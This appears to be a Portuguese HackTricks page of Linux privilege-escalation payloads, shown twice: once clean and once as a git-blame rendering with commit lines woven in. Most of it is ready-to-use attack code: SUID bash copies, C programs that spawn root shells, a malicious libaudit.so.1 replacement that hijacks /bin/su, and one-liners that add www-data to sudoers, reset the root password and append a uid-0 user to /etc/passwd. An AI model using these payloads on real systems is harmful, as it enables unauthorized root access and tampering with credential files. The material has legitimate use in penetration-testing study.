hacktricks/linux-hardening/privilege-escalation/payloads-to-execute.md

# Payloads to execute

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>
{% endhint %}

## Bash
```bash
cp /bin/bash /tmp/b && chmod +s /tmp/b
/bin/b -p #Maintains root privileges from suid, working in debian & buntu
```
## C
```c
//gcc payload.c -o payload
int main(void){
setresuid(0, 0, 0); //Set as user suid user
system("/bin/sh");
return 0;
}
```

```c
//gcc payload.c -o payload
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(){
setuid(getuid());
system("/bin/bash");
return 0;
}
```

```c
// Privesc to user id: 1000
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void) {
char *const paramList[10] = {"/bin/bash", "-p", NULL};
const int id = 1000;
setresuid(id, id, id);
execve(paramList[0], paramList, NULL);
return 0;
}
```
## Sobrescrevendo um arquivo para escalar privilégios

### Arquivos comuns

* Adicionar usuário com senha em _/etc/passwd_
* Alterar senha dentro de _/etc/shadow_
* Adicionar usuário aos sudoers em _/etc/sudoers_
* Abusar do docker através do socket do docker, geralmente em _/run/docker.sock_ ou _/var/run/docker.sock_

### Sobrescrevendo uma biblioteca

Verifique uma biblioteca usada por algum binário, neste caso `/bin/su`:
```bash
ldd /bin/su
linux-vdso.so.1 (0x00007ffef06e9000)
libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)
libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)
libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)
```
Neste caso, vamos tentar se passar por `/lib/x86_64-linux-gnu/libaudit.so.1`.\
Então, verifique as funções desta biblioteca usadas pelo binário **`su`**:
```bash
objdump -T /bin/su | grep audit
0000000000000000      DF *UND*  0000000000000000              audit_open
0000000000000000      DF *UND*  0000000000000000              audit_log_user_message
0000000000000000      DF *UND*  0000000000000000              audit_log_acct_message
000000000020e968 g    DO .bss   0000000000000004  Base        audit_fd
```
Os símbolos `audit_open`, `audit_log_acct_message`, `audit_log_acct_message` e `audit_fd` provavelmente são da biblioteca libaudit.so.1. Como a libaudit.so.1 será sobrescrita pela biblioteca compartilhada maliciosa, esses símbolos devem estar presentes na nova biblioteca compartilhada, caso contrário, o programa não conseguirá encontrar o símbolo e sairá.
```c
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

//gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c

int audit_open;
int audit_log_acct_message;
int audit_log_user_message;
int audit_fd;

void inject()__attribute__((constructor));

void inject()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
```
Agora, apenas chamando **`/bin/su`** você obterá um shell como root.

## Scripts

Você pode fazer o root executar algo?

### **www-data para sudoers**
```bash
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
```
### **Mudar a senha do root**
```bash
echo "root:hacked" | chpasswd
```
### Adicionar novo usuário root ao /etc/passwd
```bash
echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
```
{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Supporte o HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>
{% endhint %}
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`# Payloads to execute`

			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`<summary>Support HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para o [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3227] No subject 2022-05-31 22:22:36 +00:00			`## Bash`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`cp /bin/bash /tmp/b && chmod +s /tmp/b`
			`/bin/b -p #Maintains root privileges from suid, working in debian & buntu`
			```
GitBook: [#3227] No subject 2022-05-31 22:22:36 +00:00			`## C`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```c
GitBook: [master] 429 pages modified 2021-01-08 17:01:29 +00:00			`//gcc payload.c -o payload`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`int main(void){`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-07 05:33:07 +00:00			`setresuid(0, 0, 0); //Set as user suid user`
			`system("/bin/sh");`
			`return 0;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`
			```

			```c
GitBook: [master] 429 pages modified 2021-01-08 17:01:29 +00:00			`//gcc payload.c -o payload`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`#include <stdio.h>`
			`#include <unistd.h>`
			`#include <sys/types.h>`

			`int main(){`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-07 05:33:07 +00:00			`setuid(getuid());`
			`system("/bin/bash");`
			`return 0;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`
			```

GitBook: [#3227] No subject 2022-05-31 22:22:36 +00:00			```c
			`// Privesc to user id: 1000`
			`#define _GNU_SOURCE`
			`#include <stdlib.h>`
			`#include <unistd.h>`

			`int main(void) {`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-07 05:33:07 +00:00			`char *const paramList[10] = {"/bin/bash", "-p", NULL};`
			`const int id = 1000;`
			`setresuid(id, id, id);`
			`execve(paramList[0], paramList, NULL);`
			`return 0;`
GitBook: [#3227] No subject 2022-05-31 22:22:36 +00:00			`}`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Sobrescrevendo um arquivo para escalar privilégios`
GitBook: [#3227] No subject 2022-05-31 22:22:36 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`### Arquivos comuns`
GitBook: [master] 429 pages modified 2021-01-08 17:01:29 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`* Adicionar usuário com senha em _/etc/passwd_`
			`* Alterar senha dentro de _/etc/shadow_`
			`* Adicionar usuário aos sudoers em _/etc/sudoers_`
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Abusar do docker através do socket do docker, geralmente em _/run/docker.sock_ ou _/var/run/docker.sock_`
GitBook: [master] 429 pages modified 2021-01-08 17:01:29 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`### Sobrescrevendo uma biblioteca`
GitBook: [master] 429 pages modified 2021-01-08 17:01:29 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			Verifique uma biblioteca usada por algum binário, neste caso `/bin/su`:
GitBook: [master] 429 pages modified 2021-01-08 17:01:29 +00:00			```bash
			`ldd /bin/su`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-07 05:33:07 +00:00			`linux-vdso.so.1 (0x00007ffef06e9000)`
			`libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)`
			`libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)`
			`libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)`
			`libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)`
			`libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)`
			`libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)`
			`/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)`
GitBook: [master] 429 pages modified 2021-01-08 17:01:29 +00:00			```
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:54:17 +00:00			Neste caso, vamos tentar se passar por `/lib/x86_64-linux-gnu/libaudit.so.1`.\
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			Então, verifique as funções desta biblioteca usadas pelo binário `su`:
GitBook: [master] 429 pages modified 2021-01-08 17:01:29 +00:00			```bash
			`objdump -T /bin/su \| grep audit`
			`0000000000000000 DF UND 0000000000000000 audit_open`
			`0000000000000000 DF UND 0000000000000000 audit_log_user_message`
			`0000000000000000 DF UND 0000000000000000 audit_log_acct_message`
			`000000000020e968 g DO .bss 0000000000000004 Base audit_fd`
			```
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			Os símbolos `audit_open`, `audit_log_acct_message`, `audit_log_acct_message` e `audit_fd` provavelmente são da biblioteca libaudit.so.1. Como a libaudit.so.1 será sobrescrita pela biblioteca compartilhada maliciosa, esses símbolos devem estar presentes na nova biblioteca compartilhada, caso contrário, o programa não conseguirá encontrar o símbolo e sairá.
GitBook: [master] 429 pages modified 2021-01-08 17:01:29 +00:00			```c
			`#include<stdio.h>`
			`#include<stdlib.h>`
			`#include<unistd.h>`

			`//gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c`

			`int audit_open;`
			`int audit_log_acct_message;`
			`int audit_log_user_message;`
			`int audit_fd;`

			`void inject()__attribute__((constructor));`

			`void inject()`
			`{`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-07 05:33:07 +00:00			`setuid(0);`
			`setgid(0);`
			`system("/bin/bash");`
GitBook: [master] 429 pages modified 2021-01-08 17:01:29 +00:00			`}`
			```
Translated ['forensics/basic-forensic-methodology/specific-software-file 2024-02-07 05:33:07 +00:00			Agora, apenas chamando `/bin/su` você obterá um shell como root.
GitBook: [master] 429 pages modified 2021-01-08 17:01:29 +00:00
GitBook: [#3227] No subject 2022-05-31 22:22:36 +00:00			`## Scripts`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`Você pode fazer o root executar algo?`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`### www-data para sudoers`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update`
			```
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`### Mudar a senha do root`
Translated to Portuguese 2023-06-06 18:56:34 +00:00			```bash
			`echo "root:hacked" \| chpasswd`
			```
			`### Adicionar novo usuário root ao /etc/passwd`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`echo hacker:$((mkpasswd -m SHA-512 myhackerpass \|\| openssl passwd -1 -salt mysalt myhackerpass \|\| echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd`
			```
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`<summary>Supporte o HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para o [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 03:59:20 +00:00			`{% endhint %}`